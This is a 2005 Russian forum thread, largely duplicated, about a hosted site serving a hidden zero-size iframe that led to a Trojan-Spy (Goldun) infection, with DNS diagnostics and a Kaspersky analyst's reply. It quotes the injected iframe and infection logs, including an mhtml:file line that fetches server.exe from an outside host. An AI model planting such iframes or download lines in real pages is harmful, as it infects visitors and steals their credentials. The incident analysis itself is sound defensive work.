Pleshkov
Имхо нет, если Хомпага где 20 Мб и несколько фоток - то конечно хватит хоста и за $1 ... хотя я могу ошибаться =)
Имхо нет, если Хомпага где 20 Мб и несколько фоток - то конечно хватит хоста и за $1 ... хотя я могу ошибаться =)
» Флейм форума "Хостинг"
мне нужно многа места 
вопщем, буду думать, сидеть на нм.ру или переходить на платный...
вопщем, буду думать, сидеть на нм.ру или переходить на платный...GoodRobin
зачем много? у тебя же на сайте только линки на мп3.
И сколько много? (трафика)
зачем много? у тебя же на сайте только линки на мп3.
И сколько много? (трафика)
Вообщем есть такая проблема, даже не знаю насколько я по адресу, но все же уже несколько дней у меня начались проблемы с некоторыми моими сайтами т.к. домены я регистрировал у одного регистратора, а хостятся они все у одного хостера. поэтому кто виноват регистратор доменов или хостер не знаю, суть самой проблемы:
при обращении по адрессу возникает ошибка: HTTP 404 - File not found если сделать с десяток рефрешей, то можно и пробится на сайт, но потом тоже самое, также 3 раза из 10 выводит пустую страницу при попытке посмотреть исходный код можно увидить следующий фрейм:
<html>
<iframe src = "http://elizologistics.com/index.php" width = "0" height = "0">
</iframe>
</html>
Что это и почему при обращении к моим сайтам вылетает 404 или elizologistics.com я не знаю, на самом сайте даже мыла нет, загружен обычным флешавый шаб так что спросить по сути не с кого.
Вероятно все дело DNS но где в файле зоны на сервере или у регистратора домена?
Если кто может прояснить ситуацию, буду признателен. приму любые предложения.
спасибо.
p.s. адресс в подписи.
при обращении по адрессу возникает ошибка: HTTP 404 - File not found если сделать с десяток рефрешей, то можно и пробится на сайт, но потом тоже самое, также 3 раза из 10 выводит пустую страницу при попытке посмотреть исходный код можно увидить следующий фрейм:
<html>
<iframe src = "http://elizologistics.com/index.php" width = "0" height = "0">
</iframe>
</html>
Что это и почему при обращении к моим сайтам вылетает 404 или elizologistics.com я не знаю, на самом сайте даже мыла нет, загружен обычным флешавый шаб так что спросить по сути не с кого.
Вероятно все дело DNS но где в файле зоны на сервере или у регистратора домена?
Если кто может прояснить ситуацию, буду признателен. приму любые предложения.
спасибо.
p.s. адресс в подписи.
Вы у Intelhost размещаетесь?
Регистратор домена тут не причем.
Регистратор домена тут не причем.
3xp0
Да, сейчас этот вопрос решают..
но откуда этот геморой вообще мог взятся вот в чём вопрос??? есть сооброжения?
спасибо.
Да, сейчас этот вопрос решают..
но откуда этот геморой вообще мог взятся вот в чём вопрос??? есть сооброжения?
спасибо.
Sky hawk
Нет, ну так же нельзя!
Телепаты в отпуске.
Сообщи домены сайтов, с которыми проблема, чтобы посмотреть DNS записи и вообще...
Нет, ну так же нельзя!
Телепаты в отпуске.
Сообщи домены сайтов, с которыми проблема, чтобы посмотреть DNS записи и вообще...
Sky hawk
А я не говорю что это интелхост.
Я говорю что проблема у того кого вы реселлите.
Я уже посмотрел ваши ДНС.
У них на сайте есть LiveSupport - вот с ними там поговорите.
А я не говорю что это интелхост.
Я говорю что проблема у того кого вы реселлите.
Я уже посмотрел ваши ДНС.
У них на сайте есть LiveSupport - вот с ними там поговорите.
batva
sky-team.ru этот меня сейчас волнует..
3xp0
Я уже говорил с ними вначале они говорили что все нормально, действительно сайты иногда работают. Сечас они работают над этой проблеммой, но интересна причина, а они мне её сказать не могут возможно дело в последних авариях на питерском напривалении.. Я вначале даже подумал что это кто из афторов софта, т.к. мне уже ноднократно грозили чем только можно если я не уберу их софт со своих страниц.
Добавлено:
3xp0
лив суппорт что шел что ехал, там только два знающих человека, точнее три если считать администратора.
Остольные могут только нски чистить =))) + за таким количеством серверов не так то просто следить..
sky-team.ru этот меня сейчас волнует..
3xp0
Я уже говорил с ними вначале они говорили что все нормально, действительно сайты иногда работают. Сечас они работают над этой проблеммой, но интересна причина, а они мне её сказать не могут возможно дело в последних авариях на питерском напривалении.. Я вначале даже подумал что это кто из афторов софта, т.к. мне уже ноднократно грозили чем только можно если я не уберу их софт со своих страниц.
Добавлено:
3xp0
лив суппорт что шел что ехал, там только два знающих человека, точнее три если считать администратора.
Остольные могут только нски чистить =))) + за таким количеством серверов не так то просто следить..
Sky hawk
у тех ребят что вы взяли рес. пакет уже такие проблемы не в первой имеют честно говоря. Там действительно дешево - но за такие цены вы должны понимать что от проблем не убежать. на WHT про это не раз говорили. И проблемы типа вашей тоже упоминали.
Вы в курсе что у них 15.000 клиентов? А у каждого из 15к сколько =) Сеть большая - проблемы возникают.
у тех ребят что вы взяли рес. пакет уже такие проблемы не в первой имеют честно говоря. Там действительно дешево - но за такие цены вы должны понимать что от проблем не убежать. на WHT про это не раз говорили. И проблемы типа вашей тоже упоминали.
Вы в курсе что у них 15.000 клиентов? А у каждого из 15к сколько =) Сеть большая - проблемы возникают.
3xp0
я прекрасно это знал и знаю.
То что проблеммы случаются это ясно, мне интересует что такое
<html>
<iframe src = "http://elizologistics.com/index.php" width = "0" height = "0">
</iframe>
</html>
и как это связанно с 404ой. как оно вообще могло случится, причины?
Добавлено:
p.s. самое интересно что ночью по москве никаких проблемм вроде нет, вот что вчера что сегодня сейчас никак проблемм.
???
я прекрасно это знал и знаю.
То что проблеммы случаются это ясно, мне интересует что такое
<html>
<iframe src = "http://elizologistics.com/index.php" width = "0" height = "0">
</iframe>
</html>
и как это связанно с 404ой. как оно вообще могло случится, причины?
Добавлено:
p.s. самое интересно что ночью по москве никаких проблемм вроде нет, вот что вчера что сегодня сейчас никак проблемм.
???
Sky hawk
Цитата:
проблема с DNS
Цитата:
Цитата:
Цитата:
То есть на parent серере прописаны одни ns сервера, а на них в качестве ns для твоего домена числятся другие.
ХЗ почему, вероятно меняли, и неправильно прописали.
Нужно либо на parent поменять ns*.intelhost.ru на ns*.unixbsd.info
либо на ns*.intelhost.ru правильно прописать NS записи.
А elizologistics.com тут не причем.
Просто у апача, который обсуживает твой сай, в дефолтном виртуалхосте прописана эта пага с таким содержимым http://69.50.161.74/
Цитата:
вообщем обращаться тебе нужно к тому, кто админит 69.50.161.74
заодно и спросишь, чем ему так дорог elizologistics.com раз он его в дефолт прописал.
А там хто его знает, может магнитные бури.
Цитата:
sky-team.ru этот меня сейчас волнует..
проблема с DNS
Цитата:
[root@host1 t]# whois sky-team.ru
[Querying whois.ripn.net]
[whois.ripn.net]
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SKY-TEAM.RU
type: CORPORATE
nserver: ns1.intelhost.ru.
nserver: ns2.intelhost.ru.
state: REGISTERED, DELEGATED
person: Sergey V Gorbachev
phone: +7 903 6447901
e-mail: intelhost@mail.ru
registrar: RUCENTER-REG-RIPN
created: 2005.07.11
paid-till: 2006.07.11
source: TC-RIPN
Last updated on 2005.09.26 00:06:19 MSK/MSD
Цитата:
[root@host1 t]# dig @ns1.intelhost.ru sky-team.ru
; <<>> DiG 9.3.1 <<>> @ns1.intelhost.ru sky-team.ru
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17004
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;sky-team.ru. IN A
;; ANSWER SECTION:
sky-team.ru. 14400 IN A 69.50.161.74
;; AUTHORITY SECTION:
sky-team.ru. 14400 IN NS ns2.unixbsd.info.
sky-team.ru. 14400 IN NS ns3.unixbsd.info.
;; ADDITIONAL SECTION:
ns2.unixbsd.info. 14400 IN A 64.5.44.113
ns3.unixbsd.info. 14400 IN A 209.152.167.59
;; Query time: 48 msec
;; SERVER: 64.5.44.113#53(64.5.44.113)
;; WHEN: Sun Sep 25 13:14:46 2005
;; MSG SIZE rcvd: 125
Цитата:
[root@host1 t]# dig @ns3.unixbsd.info sky-team.ru
; <<>> DiG 9.3.1 <<>> @ns3.unixbsd.info sky-team.ru
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44767
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;sky-team.ru. IN A
;; ANSWER SECTION:
sky-team.ru. 14400 IN A 69.50.161.74
;; AUTHORITY SECTION:
sky-team.ru. 14400 IN NS ns2.unixbsd.info.
sky-team.ru. 14400 IN NS ns3.unixbsd.info.
;; ADDITIONAL SECTION:
ns2.unixbsd.info. 14400 IN A 64.5.44.113
ns3.unixbsd.info. 14400 IN A 209.152.167.59
;; Query time: 83 msec
;; SERVER: 209.152.167.59#53(209.152.167.59)
;; WHEN: Sun Sep 25 13:14:08 2005
;; MSG SIZE rcvd: 125
То есть на parent серере прописаны одни ns сервера, а на них в качестве ns для твоего домена числятся другие.
ХЗ почему, вероятно меняли, и неправильно прописали.
Нужно либо на parent поменять ns*.intelhost.ru на ns*.unixbsd.info
либо на ns*.intelhost.ru правильно прописать NS записи.
А elizologistics.com тут не причем.
Просто у апача, который обсуживает твой сай, в дефолтном виртуалхосте прописана эта пага с таким содержимым http://69.50.161.74/
Цитата:
<html>
<iframe src = "http://elizologistics.com/index.php" width = "0" height = "0">
</iframe>
</html>
вообщем обращаться тебе нужно к тому, кто админит 69.50.161.74
заодно и спросишь, чем ему так дорог elizologistics.com раз он его в дефолт прописал.
А там хто его знает, может магнитные бури.
batva
ну вот это уже по взрослому. У ни на сервер вроде новое железо ставили и тестовы период был 12 часов потом вроде работало, но видимо где то что слетело.
Спасибо.
Добавлено:
реально спасибо.
ну вот это уже по взрослому. У ни на сервер вроде новое железо ставили и тестовы период был 12 часов потом вроде работало, но видимо где то что слетело.
Спасибо.
Добавлено:
реально спасибо.
batva
так ведь ns*.intelhost.ru и ns*.unixbsd.info это одно и тоже... вернее IP теже там...
или все равно так нельзя?
так ведь ns*.intelhost.ru и ns*.unixbsd.info это одно и тоже... вернее IP теже там...
или все равно так нельзя?
3xp0
Цитата:
нельзя!
http://dnsreport.com/tools/dnsreport.ch?domain=sky-team.ru
Цитата:
или все равно так нельзя?
нельзя!
http://dnsreport.com/tools/dnsreport.ch?domain=sky-team.ru
batva
Удобная штука dnsreport
Удобная штука dnsreport
Здравствуйте.
Хотя у меня уже болит голова, глаза и я испереживался, попробую написать подробно... Я не могу понять, что это вообще такое. Сегодня (уже вчера) в 17:33 ко мне обратился знакомый человек по форуму и сказал, что с его сайтом что-то не то. Сайт у него уже до этого момента был полностью функционирующем на движке - sPaiz-Nuke (версия проверенная и довольно известная - общедоступная), проблема в том, что при открытии головной страницы в нижней строке браузера появлялся непонятный сайт - http://elizologistics.com/index.php и открывался его сайт - www.sky-team.ru с чистой белой страницей. Хостер его не знает в чём дело. Смотрели ns - серверы, прописаны правильные - его хостера, домен зарегистрирован на него... Так вот после загрузки его страницы, я открыл HTML - код страницы, там было прописано вот это:
<html>
<iframe src="http://elizologistics.com/index.php" width="0" height="0"></iframe>
</html>
Такого я никогда не видел, поэтому пошёл посмотреть, что за сайт (хотя, я думаю и до этого уже словил)... Сайт вроде приличный, как я понял занимается какими-то перевозками. Никакого отношения к таким вещам - трояны, шпионы, регистраторы доменов и т.п. иметь не должен.Так мы и не поняли, что это вообще такое и почему. Это было в 17:33, потом я не стал выключать компьютер полностью, а перевёл/выключил его в Спящий режим, то есть оперативная память записалась на жёсткий диск. Сейчас включил его и обратил внимание, что с браузером IE 6 что-то не то... Пропадают панели - тулбары - Робоформ - пропали значки, у другого вообще чёрные пятна вместо иконок. Тормозить начал, То появляются, то при новом окне опять пропадают. Стал просто завершать свою работу по много раз... Мне стало непонятно такое поведение, тем более ничего экстраординарного я не делал - не устанавливал программы, не лазил по подозр. сайтам и т.п.... Зашёл в C:\WINDOWS смотрю сегодня изменялся файл - setupapi.log, папка Downloaded Program Files, System32... Показалось странным это. Открыл файл - setupapi.log, а там вот это:
[2005/09/25 17:33:36 1600.1]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Program Files\Internet Explorer\hctmvefg.exe" в "C:\WINDOWS\Downloaded Program Files\hctmvefg.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Program Files\Internet Explorer\hctmvefg.exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:33:56 1600.2]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:34:28 1600.3]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:36:04 1600.4]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
В Downloaded Program Files уже ничего не было к тому моменту. Просканировал систему сканером с последними базами - ничего не показало, потом нашёл в папке временных файлов интернета - Temporary Internet Files этот файл server.exe - загружен он был с этого адреса - http://elizologistics.com/ , также проверил его с помощью Онлайн проверки, тоже ничего. Также в Temporary Internet Files с этого адреса ещё был файл - index.chm (12Кб) - файл справки Windows и пара HTML файлов и Флеш - все с этого сайта. Проверил утилитой Зайцева... Она показала вот это:
Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
C:\WINDOWS\System32\gdiwxp.dll --> Подозрение на Keylogger или троянскую DLL
C:\WINDOWS\System32\gdiwxp.dll>>> Нейросеть: файл с вероятностью 0.56% похож на типовой перехватчик событий клавиатуры/мыши
Также проверил этот файл - Онлайн, ничего. Открыл его PExplorer' ом, а там внутри... И e-gold.com, и пароли от браузера, почты, ICQ и т.п. Как я понял всё это хотят от меня. =) Также внутри этого файла (он ссылался на файл - tickcnt.bin), тоже увидел его в C:\WINDOWS\System32, вроде ничего там внутри интересного. Удалил gdiwxp.dll браузер вроде нормально заработал. Нашёл также откуда он будет загружаться, также утилита Зайцева показала:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gdiwxp
Удалил эту ветку. Потом пошёл в папку C:\Program Files\ , смотрю... А папка Internet Explorer сегодня изменялась, открываю, а там 4 файла без иконок по 12.7 Кб каждый...
gsyzcjdr.exe hctmvefg.exe injwxtdg.exe xluqpnih.exe
Их тоже удалил. Время их создания 17:33, да и прописаны они в HTML файлах с этого сайта, типа такого:
<html><pre>
*** Code Download Log entry (25 Sep 2005 @ 17:36:05) ***
Code Download Error: (hr = 800714c7) В сетевом управляющем блоке (NCB) указан недопустимый номер имени.
NCB представляет данные.
Operation failed. Detailed Information:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
CLSID: {10000000-1000-0000-1000-000000000000}
Extension:
Type:
LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
--- Detailed Error Log Follows ---
LOG: Download OnStopBinding called (hrStatus = 0 / hrResponseHdr = 0).
LOG: URL Download Complete: hrStatus:0, hrOSB:0, hrResponseHdr:0, URL
mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe)
LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
LOG: Setup successful installing: server.exe to (null) destination code(0)
WRN: OBJECT tags for CLASSID=10000000... have mixed usage with CODEBASE=file:///C:/Program%20Files/Internet%20Explorer/injwxtdg.exe and mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
LOG: Reporting Code Download Completion: (hr:800714c7 (FAILED), CLASSID: 10000000..., szCODEmhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe), MainTypenull), MainExtnull))
</pre></html>
После удаления этого руткита - gdiwxp.dll, он появился с новым именем - gdiw2k.dll, удалил только после перезагрузки.
Вообщем, я не знаю, что и думать... Помогите пожалуйста, скажите, что это за ситуация вообще с сайтом этого человека, и как полностью всё мне вычистить. И заразился ли я уже... То есть мои все пароли ту-ту? У меня на комп. очень много важной информации. Могло ли меня спасти, что он ещё не успел стартовать, а только прописался в автозагрузку? Так как я комп. не перезагружал с того момента... Я посылаю вам все эти файлы, а также страницы с этого... сайта. Там ещё правда Флеш есть на 300 Кб. но я думаю это из надписей - содержания, не имеют отношения к этому.
С уважением, Александр.
Здраствуйте!
Это Trojan-Spy.Win32.Goldun.cc
Детектирование будет добавлено в следующее обновление антивирусных баз.
Подождите ближайшего обновления антивирусных баз и просканируйте систему
еще раз. Я думаю найдется много чего интересного.
Посоветуйте проделать то же самое вашему знакомому.
А следующая строчка из Вашего лога:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
=====================
показывает, какой именно файл и откуда вы подцепили ("нужное подчеркнуть")
С уважением, Антон Дунаев
Вирусный аналитик
ЗАО "Лаборатория Касперского"
Тел/Факс: +7 (095) 797-8700
E-mail: newvirus@kaspersky.com
Internet: http://www.kaspersky.com, http://www.viruslist.com
Хотя у меня уже болит голова, глаза и я испереживался, попробую написать подробно... Я не могу понять, что это вообще такое. Сегодня (уже вчера) в 17:33 ко мне обратился знакомый человек по форуму и сказал, что с его сайтом что-то не то. Сайт у него уже до этого момента был полностью функционирующем на движке - sPaiz-Nuke (версия проверенная и довольно известная - общедоступная), проблема в том, что при открытии головной страницы в нижней строке браузера появлялся непонятный сайт - http://elizologistics.com/index.php и открывался его сайт - www.sky-team.ru с чистой белой страницей. Хостер его не знает в чём дело. Смотрели ns - серверы, прописаны правильные - его хостера, домен зарегистрирован на него... Так вот после загрузки его страницы, я открыл HTML - код страницы, там было прописано вот это:
<html>
<iframe src="http://elizologistics.com/index.php" width="0" height="0"></iframe>
</html>
Такого я никогда не видел, поэтому пошёл посмотреть, что за сайт (хотя, я думаю и до этого уже словил)... Сайт вроде приличный, как я понял занимается какими-то перевозками. Никакого отношения к таким вещам - трояны, шпионы, регистраторы доменов и т.п. иметь не должен.Так мы и не поняли, что это вообще такое и почему. Это было в 17:33, потом я не стал выключать компьютер полностью, а перевёл/выключил его в Спящий режим, то есть оперативная память записалась на жёсткий диск. Сейчас включил его и обратил внимание, что с браузером IE 6 что-то не то... Пропадают панели - тулбары - Робоформ - пропали значки, у другого вообще чёрные пятна вместо иконок. Тормозить начал, То появляются, то при новом окне опять пропадают. Стал просто завершать свою работу по много раз... Мне стало непонятно такое поведение, тем более ничего экстраординарного я не делал - не устанавливал программы, не лазил по подозр. сайтам и т.п.... Зашёл в C:\WINDOWS смотрю сегодня изменялся файл - setupapi.log, папка Downloaded Program Files, System32... Показалось странным это. Открыл файл - setupapi.log, а там вот это:
[2005/09/25 17:33:36 1600.1]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Program Files\Internet Explorer\hctmvefg.exe" в "C:\WINDOWS\Downloaded Program Files\hctmvefg.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Program Files\Internet Explorer\hctmvefg.exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:33:56 1600.2]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:34:28 1600.3]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
[2005/09/25 17:36:04 1600.4]
#-198 Обработана командная строка: C:\PROGRA~1\INTERN~1\iexplore.exe www.sky-team.ru
#-024 Копирование файла "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" в "C:\WINDOWS\Downloaded Program Files\server.exe".
#E361 Неподписанный или неправильно подписанный файл "C:\Documents and Settings\Александр\Local Settings\Temporary Internet Files\Content.IE5\CTIB0LIV\server[1].exe" будет установлен (Политика=Игнорировать). Ошибка 0x800b0100: В этом объекте нет подписи.
В Downloaded Program Files уже ничего не было к тому моменту. Просканировал систему сканером с последними базами - ничего не показало, потом нашёл в папке временных файлов интернета - Temporary Internet Files этот файл server.exe - загружен он был с этого адреса - http://elizologistics.com/ , также проверил его с помощью Онлайн проверки, тоже ничего. Также в Temporary Internet Files с этого адреса ещё был файл - index.chm (12Кб) - файл справки Windows и пара HTML файлов и Флеш - все с этого сайта. Проверил утилитой Зайцева... Она показала вот это:
Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
C:\WINDOWS\System32\gdiwxp.dll --> Подозрение на Keylogger или троянскую DLL
C:\WINDOWS\System32\gdiwxp.dll>>> Нейросеть: файл с вероятностью 0.56% похож на типовой перехватчик событий клавиатуры/мыши
Также проверил этот файл - Онлайн, ничего. Открыл его PExplorer' ом, а там внутри... И e-gold.com, и пароли от браузера, почты, ICQ и т.п. Как я понял всё это хотят от меня. =) Также внутри этого файла (он ссылался на файл - tickcnt.bin), тоже увидел его в C:\WINDOWS\System32, вроде ничего там внутри интересного. Удалил gdiwxp.dll браузер вроде нормально заработал. Нашёл также откуда он будет загружаться, также утилита Зайцева показала:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gdiwxp
Удалил эту ветку. Потом пошёл в папку C:\Program Files\ , смотрю... А папка Internet Explorer сегодня изменялась, открываю, а там 4 файла без иконок по 12.7 Кб каждый...
gsyzcjdr.exe hctmvefg.exe injwxtdg.exe xluqpnih.exe
Их тоже удалил. Время их создания 17:33, да и прописаны они в HTML файлах с этого сайта, типа такого:
<html><pre>
*** Code Download Log entry (25 Sep 2005 @ 17:36:05) ***
Code Download Error: (hr = 800714c7) В сетевом управляющем блоке (NCB) указан недопустимый номер имени.
NCB представляет данные.
Operation failed. Detailed Information:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
CLSID: {10000000-1000-0000-1000-000000000000}
Extension:
Type:
LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
--- Detailed Error Log Follows ---
LOG: Download OnStopBinding called (hrStatus = 0 / hrResponseHdr = 0).
LOG: URL Download Complete: hrStatus:0, hrOSB:0, hrResponseHdr:0, URL
mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe) LOG: File C:\WINDOWS\Downloaded Program Files\server.exe being registered.
LOG: Setup successful installing: server.exe to (null) destination code(0)
WRN: OBJECT tags for CLASSID=10000000... have mixed usage with CODEBASE=file:///C:/Program%20Files/Internet%20Explorer/injwxtdg.exe and mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
LOG: Reporting Code Download Completion: (hr:800714c7 (FAILED), CLASSID: 10000000..., szCODE
mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe), MainTypenull), MainExtnull)) </pre></html>
После удаления этого руткита - gdiwxp.dll, он появился с новым именем - gdiw2k.dll, удалил только после перезагрузки.
Вообщем, я не знаю, что и думать... Помогите пожалуйста, скажите, что это за ситуация вообще с сайтом этого человека, и как полностью всё мне вычистить. И заразился ли я уже... То есть мои все пароли ту-ту? У меня на комп. очень много важной информации. Могло ли меня спасти, что он ещё не успел стартовать, а только прописался в автозагрузку? Так как я комп. не перезагружал с того момента... Я посылаю вам все эти файлы, а также страницы с этого... сайта. Там ещё правда Флеш есть на 300 Кб. но я думаю это из надписей - содержания, не имеют отношения к этому.
С уважением, Александр.
Здраствуйте!
Это Trojan-Spy.Win32.Goldun.cc
Детектирование будет добавлено в следующее обновление антивирусных баз.
Подождите ближайшего обновления антивирусных баз и просканируйте систему
еще раз. Я думаю найдется много чего интересного.
Посоветуйте проделать то же самое вашему знакомому.
А следующая строчка из Вашего лога:
CodeBase: mhtml:file://C:\ARCHIVE.MHT!http://elizologistics.com/server.exe
=====================
показывает, какой именно файл и откуда вы подцепили ("нужное подчеркнуть")
С уважением, Антон Дунаев
Вирусный аналитик
ЗАО "Лаборатория Касперского"
Тел/Факс: +7 (095) 797-8700
E-mail: newvirus@kaspersky.com
Internet: http://www.kaspersky.com, http://www.viruslist.com
во как..
Подобное я уже видел может с полугода назад.
Когда подменяли индексную страницу через дырку в одном из клонов php-nuke
Кстати, сам сайт elizologistics может быть не причем, он тоже наверняко был взломан.
Donatello
Что же ты не обновляешь винду и эксплорер, эта уязвимость (mhtml:file уже давным давно фиксили.
Цитата:
никакой гарантии.
Он уже был в памяти, раз прописал себя в автозагрузку, а значит уже и отослать мог успеть.
В любом случае первый совет, это быстро идти и менять все пароли. Желательно делать это с чистой машины.
Когда подменяли индексную страницу через дырку в одном из клонов php-nuke
Кстати, сам сайт elizologistics может быть не причем, он тоже наверняко был взломан.
Donatello
Что же ты не обновляешь винду и эксплорер, эта уязвимость (mhtml:file
уже давным давно фиксили. Цитата:
Могло ли меня спасти, что он ещё не успел стартовать, а только прописался в автозагрузку?
никакой гарантии.
Он уже был в памяти, раз прописал себя в автозагрузку, а значит уже и отослать мог успеть.
В любом случае первый совет, это быстро идти и менять все пароли. Желательно делать это с чистой машины.
batva
Цитата:
Это уже почти не моя квартира и система соответственно. =) Я её как установил, потом уехал жить на новую квартиру. Сейчас опять здесь живу.
Цитата:
Мог конечно. Но если проводить аналогию с тем же Пинчем, то он будет работать только после перезагрузки. Из командной строки он отошлёт только инфу о системе.
Цитата:
Ну этот совет придёт в голову каждому. =) Если бы так легко... У меня в реестре только одних ась висит штук 80-100. =) Вчера до рези в глазах поменял выборочно, на ящики не стал бесплатные. На ADSL (кабинет, интернет, e-mail сменил), сейчас посмотрю какие пароли от сайтов в реестре висят, ну их не так жалко, хотя и платных там много. WebMoney он вроде не затрагивает, только e-gold... Ну я думаю он не успел отправить, либо они ещё отчёт не получали. А так в-принципе, если бы он успел отправить всю вообще информацию, мне оставалось только бы повеситься. =) Вообщем раскулачили бы по-полной, за все злодеяния. =))) Он же ещё прописался в C:\WINDOWS\system32\drivers\etc\services
То ли он ещё порты собрался открывать... =) Но я не могу определить точные его записи...
Это начало файла:
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
qotd 17/udp quote #Quote of the day
chargen 19/tcp ttytst source #Character generator
chargen 19/udp ttytst source #Character generator
Вот это он прописал, скорее всего:
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
Вообщем, давно я на такую измену не садился. =)
Цитата:
Что же ты не обновляешь винду и эксплорер, эта уязвимость (mhtml:file уже давным давно фиксили.
Это уже почти не моя квартира и система соответственно. =) Я её как установил, потом уехал жить на новую квартиру. Сейчас опять здесь живу.
Цитата:
никакой гарантии.
Он уже был в памяти, раз прописал себя в автозагрузку, а значит уже и отослать мог успеть.
Мог конечно. Но если проводить аналогию с тем же Пинчем, то он будет работать только после перезагрузки. Из командной строки он отошлёт только инфу о системе.
Цитата:
В любом случае первый совет, это быстро идти и менять все пароли.
Ну этот совет придёт в голову каждому. =) Если бы так легко... У меня в реестре только одних ась висит штук 80-100. =) Вчера до рези в глазах поменял выборочно, на ящики не стал бесплатные. На ADSL (кабинет, интернет, e-mail сменил), сейчас посмотрю какие пароли от сайтов в реестре висят, ну их не так жалко, хотя и платных там много. WebMoney он вроде не затрагивает, только e-gold... Ну я думаю он не успел отправить, либо они ещё отчёт не получали. А так в-принципе, если бы он успел отправить всю вообще информацию, мне оставалось только бы повеситься. =) Вообщем раскулачили бы по-полной, за все злодеяния. =))) Он же ещё прописался в C:\WINDOWS\system32\drivers\etc\services
То ли он ещё порты собрался открывать... =) Но я не могу определить точные его записи...
Это начало файла:
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
daytime 13/tcp
daytime 13/udp
qotd 17/tcp quote #Quote of the day
